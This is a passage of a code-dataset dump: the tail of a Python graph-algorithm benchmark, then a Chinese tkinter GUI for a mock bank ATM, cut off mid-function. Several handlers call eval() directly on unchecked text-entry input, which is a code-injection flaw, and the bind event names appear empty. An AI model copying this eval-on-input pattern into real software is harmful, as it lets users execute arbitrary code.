time = \", runtime, \" second\", end = \" \")\n print(\"\")\n\n\n alg = DFS(g)\n print(\"\\t\\t\\tDFS: \", end = \" \")\n result, runtime = benchmark(alg)\n print(\"\\t\\t result = \", result, \" time = \", runtime, \" second\", end = \" \")\n print(\"\")\n\n alg = Undirected_BFS(g)\n print(\"\\tBFS (undirected): \", end = \" \")\n result, runtime = benchmark(alg)\n print(\"\\t\\t result = \", result, \" time = \", runtime, \" second\", end=\" \")\n print(\"\")\n\n\n alg = Tarjan_SCC(g)\n print(\"\\t\\tTarjan SCC: \", end = \" \")\n result, runtime = benchmark(alg)\n print(\"\\t\\t result = \", result, \" time = \", runtime, \" second\", end=\" \")\n print(\"\")\n\n\n alg = Johnson(g)\n print(\"\\tJohn's algorithm: \", end = \" \")\n result, runtime = benchmark(alg)\n print(\"\\t\\t result = \", result, \" time = \", runtime, \" second\", end=\" \")\n print(\"\")\n\n","repo_name":"jaber-the-great/Seagull-Network-verification","sub_path":"Code/dummyCode/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15807247592","text":"#!/usr/bin/env python\r\n# -*- coding:utf-8 -*-\r\nimport tkinter\r\nimport tkinter.messagebox\r\nfrom tkinter import ttk\r\nimport time\r\nfrom PIL import Image, ImageTk\r\n\"\"\"\r\n界面\r\n类名:View\r\n属性:\r\n行为:管理员界面 管理员登陆 系统功能界面\r\nopen_count\r\ncheck_deposit\r\nwithdrawal\r\ndeposit\r\ntransfer_accounts\r\nchange_password\r\nfreeze_card\r\nunfreeze_card\r\ncard_reissue\r\naccount_cancellation\r\nrefund_card\r\n\"\"\"\r\n\r\n\r\nclass TerminalGui(object):\r\n pass\r\n\r\n\r\nclass ATMGui(object):\r\n widget_list = []\r\n color_name = []\r\n color_dict = {\"浅粉红\": \"#FFB6C1\", \"粉红\": \"#FFC0CB\", \"猩红\": \"#DC143C\", \"淡紫红\": \"#FFF0F5\",\r\n \"弱紫罗兰红\": \"#DB7093\", \"热情的粉红\": \"#FF69B4\", \"深粉红\": \"#FF1493\", \"中紫罗兰红\": \"#C71585\",\r\n \"兰花紫\": \"#DA70D6\", \"蓟色\": \"#D8BFD8\", \"洋李色紫\": \"#DDA0DD\", \"紫罗兰\": \"#EE82EE\",\r\n \"洋红/玫瑰红\": \"#FF00FF\", \"灯笼海棠\": \"#FF00FF\", \"深洋红\": \"#8B008B\", \"紫色\": \"#800080\",\r\n \"暗紫罗兰\": \"#9400D3\", \"暗兰花紫\": \"#9932CC\", \"靛青\": \"#4B0082\",\r\n \"蓝紫罗兰\": \"#8A2BE2\", \"中紫色\": \"#9370DB\", \"中暗蓝色\": \"#7B68EE\", \"石蓝色\": \"#6A5ACD\",\r\n \"暗板岩蓝\": \"#483D8B\", \"熏衣草淡紫\": \"#E6E6FA\", \"幽灵白\": \"#F8F8FF\", \"纯蓝\": \"#0000FF\",\r\n \"中蓝色\": \"#0000CD\", \"午夜蓝\": \"#191970\", \"暗蓝色\": \"#00008B\", \"海军蓝\": \"#000080\",\r\n \"皇家蓝\": \"#4169E1\", \"矢车菊蓝\": \"#6495ED\", \"亮钢蓝\": \"#B0C4DE\", \"亮蓝灰\": \"#778899\",\r\n \"灰石色\": \"#708090\", \"闪兰色\": \"#1E90FF\", \"爱丽丝蓝\": \"#F0F8FF\", \"钢蓝\": \"#4682B4\", \"亮天蓝色\": \"#87CEFA\",\r\n \"天蓝色\": \"#87CEEB\", \"深天蓝\": \"#00BFFF\", \"亮蓝\": \"#ADD8E6\", \"火药青\": \"#B0E0E6\", \"军兰色\": \"#5F9EA0\",\r\n \"蔚蓝色\": \"#F0FFFF\", \"淡青色\": \"#E0FFFF\", \"弱绿宝石\": \"#AFEEEE\", \"青色\": \"#00FFFF\", \"浅绿色\": \"#00FFFF\",\r\n \"暗绿宝石\": \"#00CED1\", \"暗瓦灰色\": \"#2F4F4F\", \"暗青色\": \"#008B8B\", \"水鸭色\": \"#008080\", \"中绿宝石\": \"#48D1CC\",\r\n \"浅海洋绿\": \"#20B2AA\", \"绿宝石\": \"#40E0D0\", \"宝石碧绿\": \"#7FFFD4\", \"中宝石碧绿\": \"#66CDAA\", \"中春绿色\": \"#00FA9A\",\r\n \"薄荷奶油\": \"#F5FFFA\", \"春绿色\": \"#00FF7F\", \"中海洋绿\": \"#3CB371\", \"海洋绿\": \"#2E8B57\", \"蜜色\": \"#F0FFF0\",\r\n \"淡绿色\": \"#90EE90\", \"弱绿色\": \"#98FB98\", \"暗海洋绿\": \"#8FBC8F\", \"闪光深绿\": \"#32CD32\", \"闪光绿\": \"#00FF00\",\r\n \"森林绿\": \"#228B22\", \"纯绿\": \"#008000\", \"暗绿色\": \"#006400\", \"查特酒绿\": \"#7FFF00\", \"草坪绿\": \"#7CFC00\",\r\n \"绿黄色\": \"#ADFF2F\", \"暗橄榄绿\": \"#556B2F\", \"黄绿色\": \"#9ACD32\", \"橄榄褐色\": \"#6B8E23\", \"米色\": \"#F5F5DC\",\r\n \"亮菊黄\": \"#FAFAD2\", \"象牙色\": \"#FFFFF0\", \"浅黄色\": \"#FFFFE0\", \"纯黄\": \"#FFFF00\", \"橄榄\": \"#808000\",\r\n \"深卡叽布\": \"#BDB76B\", \"柠檬绸\": \"#FFFACD\", \"苍麒麟色\": \"#EEE8AA\", \"卡叽布\": \"#F0E68C\", \"金色\": \"#FFD700\",\r\n \"玉米丝色\": \"#FFF8DC\", \"金菊黄\": \"#DAA520\", \"暗金菊黄\": \"#B8860B\", \"花的白色\": \"#FFFAF0\", \"旧蕾丝\": \"#FDF5E6\",\r\n \"小麦色\": \"#F5DEB3\", \"鹿皮色\": \"#FFE4B5\", \"橙色\": \"#FFA500\", \"番木瓜\": \"#FFEFD5\", \"白杏色\": \"#FFEBCD\",\r\n \"纳瓦白\": \"#FFDEAD\", \"古董白\": \"#FAEBD7\", \"茶色\": \"#D2B48C\", \"硬木色\": \"#DEB887\", \"陶坯黄\": \"#FFE4C4\",\r\n \"深橙色\": \"#FF8C00\", \"亚麻布\": \"#FAF0E6\", \"秘鲁色\": \"#CD853F\", \"桃肉色\": \"#FFDAB9\", \"沙棕色\": \"#F4A460\",\r\n \"巧克力色\": \"#D2691E\", \"重褐色\": \"#8B4513\", \"海贝壳\": \"#FFF5EE\", \"黄土赭色\": \"#A0522D\", \"浅鲑鱼肉色\": \"#FFA07A\",\r\n \"珊瑚\": \"#FF7F50\", \"橙红色\": \"#FF4500\", \"深鲜肉\": \"#E9967A\", \"番茄红\": \"#FF6347\", \"浅玫瑰色\": \"#FFE4E1\",\r\n \"鲑鱼色\": \"#FA8072\", \"雪白色\": \"#FFFAFA\", \"淡珊瑚色\": \"#F08080\", \"玫瑰棕色\": \"#BC8F8F\", \"印度红\": \"#CD5C5C\",\r\n \"纯红\": \"#FF0000\", \"棕色\": \"#A52A2A\", \"火砖色\": \"#B22222\", \"深红色\": \"#8B0000\", \"栗色\": \"#800000\", \"纯白\": \"#FFFFFF\",\r\n \"白烟\": \"#F5F5F5\", \"淡灰色\": \"#DCDCDC\", \"浅灰色\": \"#D3D3D3\", \"银灰色\": \"#C0C0C0\", \"深灰色\": \"#A9A9A9\",\r\n \"灰色\": \"#808080\", \"暗淡灰\": \"#696969\", \"纯黑\": \"#000000\"}\r\n for name in color_dict.keys():\r\n color_name.append(name)\r\n\r\n def __init__(self, fnc_open_count,\r\n fnc_withdrawal,\r\n fnc_deposit,\r\n fnc_transfer_accounts,\r\n fnc_change_password,\r\n fnc_freeze_card,\r\n fnc_unfreeze_card,\r\n fnc_card_reissue,\r\n fnc_account_cancellation,\r\n fnc_refund_card,\r\n fnc_read_cord,\r\n fnc_login):\r\n self.fnc_open_count = fnc_open_count\r\n self.fnc_withdrawal = fnc_withdrawal\r\n self.fnc_deposit = fnc_deposit\r\n self.fnc_transfer_accounts = fnc_transfer_accounts\r\n self.fnc_change_password = fnc_change_password\r\n self.fnc_freeze_card = fnc_freeze_card\r\n self.fnc_unfreeze_card = fnc_unfreeze_card\r\n self.fnc_card_reissue = fnc_card_reissue\r\n self.fnc_account_cancellation = fnc_account_cancellation\r\n self.fnc_refund_card = fnc_refund_card\r\n self.fnc_read_cord = fnc_read_cord\r\n self.fnc_login = fnc_login\r\n self.font_color = \"#DEB887\"\r\n self.background_color = \"#696969\"\r\n # self.screen_col = self.background_color\r\n\r\n self.main_window = tkinter.Tk()\r\n self.main_window.title(\"ATM终端\")\r\n self.main_window.geometry(\"940x700+500+200\")\r\n\r\n self.screen_t = tkinter.StringVar()\r\n self.bt_l1_t = tkinter.StringVar()\r\n\r\n self.bt_l2_t = tkinter.StringVar()\r\n self.bt_l3_t = tkinter.StringVar()\r\n self.bt_l4_t = tkinter.StringVar()\r\n self.bt_r1_t = tkinter.StringVar()\r\n self.bt_r2_t = tkinter.StringVar()\r\n self.bt_r3_t = tkinter.StringVar()\r\n self.bt_r4_t = tkinter.StringVar()\r\n self.bt_b1_t = tkinter.StringVar()\r\n\r\n frm = tkinter.Frame(self.main_window, bg=\"silver\")\r\n frm.pack()\r\n\r\n self.screen_b = tkinter.Frame(frm, bg=\"silver\", height=100, width=1000)\r\n self.screen_b.pack(side=tkinter.BOTTOM, fill=tkinter.X)\r\n frm_l = tkinter.Frame(frm, bg=\"silver\", height=500, width=150)\r\n frm_l.pack(side=tkinter.LEFT, fill=tkinter.Y)\r\n frm_r = tkinter.Frame(frm, bg=\"silver\", height=500, width=150)\r\n frm_r.pack(side=tkinter.RIGHT, fill=tkinter.Y)\r\n frm_bg = tkinter.Frame(frm, bg=\"black\", height=600, width=700)\r\n frm_bg.pack(side=tkinter.TOP, pady=10)\r\n\r\n # image = Image.open(\"screen_m_bg.jpg\")\r\n # im = ImageTk.PhotoImage(image)\r\n # frm_m = tkinter.Frame(frm_bg, bg=\"green\", height=580, width=680)\r\n # frm_m.pack(padx=10, pady=10)\r\n\r\n # image = Image.open(r\"image\\bg1.jpg\") # screen_m_bg.jpg img.gif\r\n # bg1 = ImageTk.PhotoImage(image)\r\n # self.screen_m = tkinter.Canvas(frm_m, height=580, width=680, bg='cyan')\r\n # self.screen_m.create_image((0, 0), image=bg1) # 1440, 1280 1024, 768\r\n # self.screen_m.place(x=-2, y=-2)\r\n self.screen_m = tkinter.Frame(frm_bg, bg=self.background_color, height=580, width=680) # , image=im\r\n self.screen_m.pack(padx=10, pady=10) # self.screen_col\r\n\r\n # image = Image.open(r\"image\\button1.png\") # screen_m_bg.jpg img.gif\r\n # button1 = ImageTk.PhotoImage(image)\r\n # button1 = tkinter.PhotoImage(file=r\"image\\img.gif\")\r\n self.bt_l1 = tkinter.Button(frm_l, textvariable=self.bt_l1_t, width=10, height=2) # , image=button1\r\n self.bt_l1.pack(padx=20, pady=40)\r\n self.bt_l2 = tkinter.Button(frm_l, textvariable=self.bt_l2_t, width=10, height=2)\r\n self.bt_l2.pack(padx=20, pady=40)\r\n self.bt_l3 = tkinter.Button(frm_l, textvariable=self.bt_l3_t, width=10, height=2)\r\n self.bt_l3.pack(padx=20, pady=40)\r\n self.bt_l4 = tkinter.Button(frm_l, textvariable=self.bt_l4_t, width=10, height=2)\r\n self.bt_l4.pack(padx=20, pady=40)\r\n\r\n self.bt_r1 = tkinter.Button(frm_r, textvariable=self.bt_r1_t, width=10, height=2)\r\n self.bt_r1.pack(padx=20, pady=40)\r\n self.bt_r2 = tkinter.Button(frm_r, textvariable=self.bt_r2_t, width=10, height=2)\r\n self.bt_r2.pack(padx=20, pady=40)\r\n self.bt_r3 = tkinter.Button(frm_r, textvariable=self.bt_r3_t, width=10, height=2)\r\n self.bt_r3.pack(padx=20, pady=40)\r\n self.bt_r4 = tkinter.Button(frm_r, textvariable=self.bt_r4_t, width=10, height=2)\r\n self.bt_r4.pack(padx=20, pady=40)\r\n\r\n self.bt_b1 = tkinter.Button(self.screen_b, textvariable=self.bt_b1_t, width=20, height=2) #\r\n self.bt_b1.pack(side=tkinter.RIGHT, padx=20, pady=20)\r\n self.page_home()\r\n\r\n def set_fnc(self, bt, fnc):\r\n if bt is \"l1\":\r\n self.bt_l1.bind(\"\", fnc)\r\n elif bt is \"l2\":\r\n self.bt_l2.bind(\"\", fnc)\r\n elif bt is \"l3\":\r\n self.bt_l3.bind(\"\", fnc)\r\n elif bt is \"l4\":\r\n self.bt_l4.bind(\"\", fnc)\r\n elif bt is \"r1\":\r\n self.bt_r1.bind(\"\", fnc)\r\n elif bt is \"r2\":\r\n self.bt_r2.bind(\"\", fnc)\r\n elif bt is \"r3\":\r\n self.bt_r3.bind(\"\", fnc)\r\n elif bt is \"r4\":\r\n self.bt_r4.bind(\"\", fnc)\r\n else:\r\n self.bt_b1.bind(\"\", fnc)\r\n\r\n @staticmethod\r\n def message_box(title: str, info: str):\r\n tkinter.messagebox.showinfo(title, info)\r\n\r\n def clear_page(self):\r\n for w in self.widget_list:\r\n w.destroy()\r\n self.widget_list = []\r\n self.bt_l1.unbind_all(\"\")\r\n self.bt_l1_t.set(\"\")\r\n self.bt_l2.unbind_all(\"\")\r\n self.bt_l2_t.set(\"\")\r\n self.bt_l3.unbind_all(\"\")\r\n self.bt_l3_t.set(\"\")\r\n self.bt_l4.unbind_all(\"\")\r\n self.bt_l4_t.set(\"\")\r\n self.bt_r1.unbind_all(\"\")\r\n self.bt_r1_t.set(\"\")\r\n self.bt_r2.unbind_all(\"\")\r\n self.bt_r2_t.set(\"\")\r\n self.bt_r3.unbind_all(\"\")\r\n self.bt_r3_t.set(\"\")\r\n self.bt_r4.unbind_all(\"\")\r\n self.bt_r4_t.set(\"\")\r\n self.bt_b1.unbind_all(\"\")\r\n self.bt_b1_t.set(\"\")\r\n\r\n def set_color(self, card_number, balance, bg_col_name=None, font_col_name=None):\r\n if bg_col_name is not None:\r\n bg_col = self.color_dict[bg_col_name]\r\n self.background_color = bg_col\r\n self.screen_m.config(bg=self.background_color)\r\n else:\r\n font_col = self.color_dict[font_col_name]\r\n self.font_color = font_col\r\n self.page_count(card_number, balance)\r\n\r\n def page_building(self):\r\n self.clear_page()\r\n self.bt_r4_t.set(\"返回\")\r\n self.set_fnc(\"r4\", lambda event: self.page_home())\r\n lb1 = tkinter.Label(self.screen_m,\r\n text=\"功能即将到来,敬请期待\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"n\")\r\n lb1.place(x=250, y=10)\r\n self.widget_list.append(lb1)\r\n\r\n def page_home(self):\r\n self.clear_page()\r\n self.bt_l1_t.set(\"开户\")\r\n self.set_fnc(\"l1\", lambda event: self.page_open_count())\r\n self.bt_l2_t.set(\"解锁\")\r\n self.set_fnc(\"l2\", lambda event: self.page_unfreeze_card())\r\n self.bt_l3_t.set(\"补卡\")\r\n self.set_fnc(\"l3\", lambda event: self.page_building())\r\n s = \"\"\"\r\n *************************************\r\n * *\r\n * 欢迎使用神马银行ATM机 *\r\n * *\r\n * *\r\n *************************************\r\n \"\"\"\r\n self.screen_t.set(s)\r\n lb1 = tkinter.Label(self.screen_m,\r\n textvariable=self.screen_t,\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"center\")\r\n lb1.place(y=200)\r\n self.widget_list.append(lb1)\r\n\r\n e1 = tkinter.Entry(self.screen_b, font=(\"黑体\", 12))\r\n e1.place(x=550, y=35)\r\n self.widget_list.append(e1)\r\n\r\n self.bt_b1_t.set(\"请放入你的银行卡\")\r\n self.set_fnc(\"b1\",\r\n lambda event: self.fnc_read_cord(eval(e1.get()) if e1.get().isdigit() else None))\r\n\r\n def page_open_count(self):\r\n self.clear_page()\r\n self.bt_r4_t.set(\"返回\")\r\n self.set_fnc(\"r4\", lambda event: self.page_home())\r\n lb1 = tkinter.Label(self.screen_m,\r\n text=\"请输入您的个人信息\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"n\")\r\n lb1.place(x=250, y=10)\r\n self.widget_list.append(lb1)\r\n\r\n lb2 = tkinter.Label(self.screen_m,\r\n text=\"姓名:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"n\")\r\n lb2.place(x=240, y=100)\r\n self.widget_list.append(lb2)\r\n e1 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n e1.place(x=300, y=105)\r\n self.widget_list.append(e1)\r\n\r\n lb3 = tkinter.Label(self.screen_m,\r\n text=\"身份证号:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"n\")\r\n lb3.place(x=200, y=130)\r\n self.widget_list.append(lb3)\r\n e2 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n e2.place(x=300, y=135)\r\n self.widget_list.append(e2)\r\n\r\n lb4 = tkinter.Label(self.screen_m,\r\n text=\"联系方式:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"n\")\r\n lb4.place(x=200, y=160)\r\n self.widget_list.append(lb4)\r\n e3 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n e3.place(x=300, y=165)\r\n self.widget_list.append(e3)\r\n\r\n lb5 = tkinter.Label(self.screen_m,\r\n text=\"住址:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"n\")\r\n lb5.place(x=240, y=190)\r\n self.widget_list.append(lb5)\r\n # **************\r\n e4 = ttk.Combobox(self.screen_m)\r\n e4[\"value\"] = (\"北京\", \"天津\", \"河北\", \"内蒙古\",\r\n \"辽宁\", \"吉林\", \"黑龙江\", \"上海\",\r\n \"江苏\", \"浙江\", \"安徽\", \"福建\", \"江西\",\r\n \"山东\", \"河南\", \"湖北\", \"湖南\", \"广东\",\r\n \"广西\", \"海南\", \"重庆\", \"四川\", \"贵州\",\r\n \"云南\", \"西藏\", \"陕西\", \"甘肃\", \"青海\",\r\n \"宁夏\", \"新疆\", \"香港\", \"澳门\", \"台湾\",\r\n \"具体的我就不写了。。。\")\r\n e4.current(0)\r\n e4.place(x=300, y=195)\r\n self.widget_list.append(e4)\r\n # **************\r\n # e4 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n # e4.place(x=300, y=195)\r\n # self.widget_list.append(e4)\r\n\r\n lb6 = tkinter.Label(self.screen_m,\r\n text=\"设置密码:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"n\")\r\n lb6.place(x=200, y=220)\r\n self.widget_list.append(lb6)\r\n e5 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n e5.place(x=300, y=225)\r\n self.widget_list.append(e5)\r\n\r\n bt1 = tkinter.Button(self.screen_m, text=\"提交\", width=10, height=1, font=(\"黑体\", 15))\r\n bt1.place(x=290, y=255)\r\n bt1.bind(\"\",\r\n lambda event: self.fnc_open_count(e1.get(), e2.get(), e3.get(), e4.get(), eval(e5.get()) if e5.get().isdigit() else None))\r\n self.widget_list.append(bt1)\r\n\r\n lb7 = tkinter.Label(self.screen_m,\r\n text=\"请及时向前台提交纸质资料!\",\r\n bg=self.background_color, fg=\"red\",\r\n font=(\"黑体\", 15),\r\n anchor=\"n\")\r\n lb7.place(x=220, y=290)\r\n self.widget_list.append(lb7)\r\n\r\n def page_login(self, card_number: int):\r\n self.clear_page()\r\n self.bt_b1_t.set(\"退卡\")\r\n self.set_fnc(\"b1\", lambda event: self.fnc_refund_card())\r\n\r\n lb1 = tkinter.Label(self.screen_m,\r\n text=\"读取成功\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb1.place(x=20, y=20)\r\n self.widget_list.append(lb1)\r\n\r\n lb2 = tkinter.Label(self.screen_m,\r\n text=\"请输入密码:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb2.place(x=200, y=260)\r\n self.widget_list.append(lb2)\r\n e1 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n e1.place(x=330, y=265)\r\n self.widget_list.append(e1)\r\n\r\n bt1 = tkinter.Button(self.screen_m,\r\n text=\"确认\",\r\n font=(\"黑体\", 12),\r\n width=10, height=2)\r\n bt1.place(x=320, y=330)\r\n bt1.bind(\"\",\r\n lambda event: self.fnc_login(card_number, e1.get()))\r\n self.widget_list.append(bt1)\r\n\r\n def page_count(self, card_number: int, balance: float):\r\n self.clear_page()\r\n self.bt_b1_t.set(\"退卡\")\r\n self.set_fnc(\"b1\", lambda event: self.fnc_refund_card())\r\n\r\n self.bt_l1_t.set(\"取款\")\r\n self.bt_l1.bind(\"\",\r\n lambda event: self.page_withdrawal(card_number, balance))\r\n self.bt_l2_t.set(\"存款\")\r\n self.bt_l2.bind(\"\",\r\n lambda event: self.page_deposit(card_number, balance))\r\n self.bt_l3_t.set(\"转账\")\r\n self.bt_l3.bind(\"\",\r\n lambda event: self.page_transfer_accounts(card_number, balance))\r\n self.bt_l4_t.set(\"改密\")\r\n self.bt_l4.bind(\"\",\r\n lambda event: self.page_change_password(card_number, balance))\r\n self.bt_r1_t.set(\"锁定\")\r\n self.bt_r1.bind(\"\",\r\n lambda event: self.page_freeze_card(card_number, balance))\r\n self.bt_r2_t.set(\"销户\")\r\n self.bt_r2.bind(\"\",\r\n lambda event: self.page_account_cancellation(card_number, balance))\r\n\r\n lb1 = tkinter.Label(self.screen_m,\r\n text=\"卡号:%d 账户余额:%.2f\" % (card_number, balance),\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb1.place(x=20, y=20)\r\n self.widget_list.append(lb1)\r\n\r\n lb2 = tkinter.Label(self.screen_m,\r\n text=\"请选择功能\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"center\")\r\n lb2.place(x=290, y=270)\r\n self.widget_list.append(lb2)\r\n\r\n lb2 = tkinter.Label(self.screen_m,\r\n text=\"设置背景颜色:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"n\")\r\n lb2.place(x=200, y=350)\r\n self.widget_list.append(lb2)\r\n e2 = ttk.Combobox(self.screen_m)\r\n e2[\"value\"] = self.color_name\r\n for index, s in enumerate(self.color_name):\r\n if self.color_dict[s] == self.background_color:\r\n e2.current(index)\r\n e2.place(x=340, y=350)\r\n e2.bind(\"<>\", lambda event: self.set_color(card_number, balance, bg_col_name=e2.get()))\r\n self.widget_list.append(e2)\r\n\r\n lb3 = tkinter.Label(self.screen_m,\r\n text=\"设置字体颜色:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"n\")\r\n lb3.place(x=200, y=380)\r\n self.widget_list.append(lb3)\r\n e3 = ttk.Combobox(self.screen_m)\r\n e3[\"value\"] = self.color_name\r\n for index, s in enumerate(self.color_name):\r\n if self.color_dict[s] == self.font_color:\r\n e3.current(index)\r\n e3.place(x=340, y=380)\r\n e3.bind(\"<>\", lambda event: self.set_color(card_number, balance, font_col_name=e3.get()))\r\n self.widget_list.append(e3)\r\n\r\n def page_withdrawal(self, card_number, balance):\r\n self.clear_page()\r\n self.bt_b1_t.set(\"退卡\")\r\n self.set_fnc(\"b1\", lambda event: self.fnc_refund_card())\r\n self.bt_r4_t.set(\"返回\")\r\n self.set_fnc(\"r4\", lambda event: self.page_count(card_number, balance))\r\n\r\n lb1 = tkinter.Label(self.screen_m,\r\n text=\"卡号:%d 账户余额:%.2f\" % (card_number, balance),\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb1.place(x=20, y=20)\r\n self.widget_list.append(lb1)\r\n\r\n lb2 = tkinter.Label(self.screen_m,\r\n text=\"请输入取款金额:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb2.place(x=180, y=260)\r\n self.widget_list.append(lb2)\r\n e1 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n e1.place(x=350, y=263)\r\n self.widget_list.append(e1)\r\n bt1 = tkinter.Button(self.screen_m,\r\n text=\"确认\",\r\n font=(\"黑体\", 12),\r\n width=10, height=2)\r\n bt1.place(x=320, y=330)\r\n bt1.bind(\"\",\r\n lambda event: self.fnc_withdrawal(event, eval(e1.get())))\r\n self.widget_list.append(bt1)\r\n\r\n def page_deposit(self, card_number, balance):\r\n self.clear_page()\r\n self.bt_b1_t.set(\"退卡\")\r\n self.set_fnc(\"b1\", lambda event: self.fnc_refund_card())\r\n self.bt_r4_t.set(\"返回\")\r\n self.bt_r4.bind(\"\",\r\n lambda event: self.page_count(card_number, balance))\r\n\r\n lb1 = tkinter.Label(self.screen_m,\r\n text=\"卡号:%d 账户余额:%.2f\" % (card_number, balance),\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb1.place(x=20, y=20)\r\n self.widget_list.append(lb1)\r\n\r\n lb2 = tkinter.Label(self.screen_m,\r\n text=\"请将现金放入下边现金槽中。\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"center\")\r\n lb2.place(x=210, y=260)\r\n self.widget_list.append(lb2)\r\n e1 = tkinter.Entry(self.screen_b, font=(\"黑体\", 12))\r\n e1.place(x=250, y=35)\r\n self.widget_list.append(e1)\r\n bt1 = tkinter.Button(self.screen_b,\r\n text=\"确认\",\r\n font=(\"黑体\", 12),\r\n width=10, height=2)\r\n bt1.place(x=450, y=25)\r\n bt1.bind(\"\",\r\n lambda event: self.fnc_deposit(eval(e1.get())))\r\n self.widget_list.append(bt1)\r\n\r\n def page_transfer_accounts(self, card_number: int, balance: float):\r\n self.clear_page()\r\n self.bt_b1_t.set(\"退卡\")\r\n self.set_fnc(\"b1\", lambda event: self.fnc_refund_card())\r\n self.bt_r4_t.set(\"返回\")\r\n self.bt_r4.bind(\"\",\r\n lambda event: self.page_count(card_number, balance))\r\n\r\n lb1 = tkinter.Label(self.screen_m,\r\n text=\"卡号:%d 账户余额:%.2f\" % (card_number, balance),\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb1.place(x=20, y=20)\r\n self.widget_list.append(lb1)\r\n\r\n lb2 = tkinter.Label(self.screen_m,\r\n text=\"请输入对方卡号:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb2.place(x=180, y=240)\r\n self.widget_list.append(lb2)\r\n e1 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n e1.place(x=350, y=243)\r\n self.widget_list.append(e1)\r\n\r\n lb3 = tkinter.Label(self.screen_m,\r\n text=\"请输入转账金额:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb3.place(x=180, y=270)\r\n self.widget_list.append(lb3)\r\n e2 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n e2.place(x=350, y=273)\r\n self.widget_list.append(e2)\r\n\r\n bt1 = tkinter.Button(self.screen_m,\r\n text=\"确认\",\r\n font=(\"黑体\", 12),\r\n width=10, height=2)\r\n bt1.place(x=300, y=310)\r\n bt1.bind(\"\",\r\n lambda event: self.fnc_transfer_accounts(eval(e1.get()), eval(e2.get())))\r\n self.widget_list.append(bt1)\r\n\r\n def page_change_password(self, card_number, balance):\r\n self.clear_page()\r\n self.bt_b1_t.set(\"退卡\")\r\n self.set_fnc(\"b1\", lambda event: self.fnc_refund_card())\r\n self.bt_r4_t.set(\"返回\")\r\n self.set_fnc(\"r4\", lambda event: self.page_count(card_number, balance))\r\n\r\n lb1 = tkinter.Label(self.screen_m,\r\n text=\"卡号:%d 账户余额:%.2f\" % (card_number, balance),\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb1.place(x=20, y=20)\r\n self.widget_list.append(lb1)\r\n\r\n lb2 = tkinter.Label(self.screen_m,\r\n text=\" 请输入旧密码:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb2.place(x=180, y=240)\r\n self.widget_list.append(lb2)\r\n e1 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n e1.place(x=350, y=243)\r\n self.widget_list.append(e1)\r\n\r\n lb3 = tkinter.Label(self.screen_m,\r\n text=\" 请输入新密码:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb3.place(x=180, y=270)\r\n self.widget_list.append(lb3)\r\n e2 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n e2.place(x=350, y=273)\r\n self.widget_list.append(e2)\r\n\r\n bt1 = tkinter.Button(self.screen_m,\r\n text=\"确认\",\r\n font=(\"黑体\", 12),\r\n width=10, height=2)\r\n bt1.place(x=300, y=310)\r\n bt1.bind(\"\",\r\n lambda event: self.fnc_change_password( eval(e1.get()), eval(e2.get()) ))\r\n self.widget_list.append(bt1)\r\n\r\n def page_freeze_card(self, card_number, balance):\r\n self.clear_page()\r\n self.bt_b1_t.set(\"退卡\")\r\n self.set_fnc(\"b1\", lambda event: self.fnc_refund_card())\r\n self.bt_r4_t.set(\"返回\")\r\n self.set_fnc(\"r4\", lambda event: self.page_count(card_number, balance))\r\n\r\n lb1 = tkinter.Label(self.screen_m,\r\n text=\"卡号:%d 